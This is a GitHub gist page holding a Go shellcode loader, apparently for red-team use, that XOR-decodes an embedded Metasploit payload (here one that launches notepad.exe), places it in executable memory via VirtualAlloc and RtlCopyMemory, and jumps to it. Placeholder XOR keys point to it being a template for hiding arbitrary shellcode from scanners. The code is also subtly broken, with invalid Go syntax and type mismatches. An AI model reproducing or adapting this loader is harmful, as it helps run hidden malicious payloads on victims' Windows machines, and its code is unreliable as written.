-
-
Save deadjakk/66f5b80378ce3c18f66b1dd11e6c1e88 to your computer and use it in GitHub Desktop.
Simple Shellcode loader implemented in Golang
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Simple Shellcode loader implemented in Golang. | |
| // | |
| // Compilation: | |
| // $ go build -o foo.exe shellcodeLoader.go | |
| // | |
| // Mariusz B. / mgeeky (@mariuszbit), '20 | |
| // <[email protected]> | |
| // | |
| package main | |
| import ( | |
| "syscall" | |
| "unsafe" | |
| ) | |
| const ( | |
| MEM_COMMIT = 0x1000 | |
| MEM_RESERVE = 0x2000 | |
| PAGE_EXECUTE_READWRITE = 0x40 | |
| KEY_1 = $KEY_1 | |
| KEY_2 = $KEY_2 | |
| ) | |
| var ( | |
| kernel32 = syscall.MustLoadDLL("kernel32.dll") | |
| ntdll = syscall.MustLoadDLL("ntdll.dll") | |
| VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") | |
| RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") | |
| ) | |
| func main() { | |
| // | |
| // simple x64 Metasploit payload launching notepad.exe | |
| // | |
| var xorKey = 0 | |
| var xoredShellcode := [] byte { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, | |
| 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, | |
| 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, | |
| 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, | |
| 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, | |
| 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, | |
| 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, | |
| 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, | |
| 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, | |
| 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, | |
| 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, | |
| 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, | |
| 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, | |
| 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, | |
| 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70, | |
| 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00 | |
| } | |
| var shellcode [] byte | |
| for i := 0; i < len(xoredShellcode); i++ { | |
| shellcode = append(shellcode, xoredShellcode[i] ^ xorKey) | |
| } | |
| addr, _, err := VirtualAlloc.Call( | |
| 0, | |
| uintptr(len(shellcode)), | |
| MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE | |
| ) | |
| if err != nil && err.Error() != "The operation completed successfully." { | |
| syscall.Exit(0) | |
| } | |
| _, _, err = RtlCopyMemory.Call( | |
| addr, | |
| (uintptr)(unsafe.Pointer(&shellcode[0])), | |
| uintptr(len(shellcode)) | |
| ) | |
| if err != nil && err.Error() != "The operation completed successfully." { | |
| syscall.Exit(0) | |
| } | |
| // jump to shellcode | |
| syscall.Syscall(addr, 0, 0, 0, 0) | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment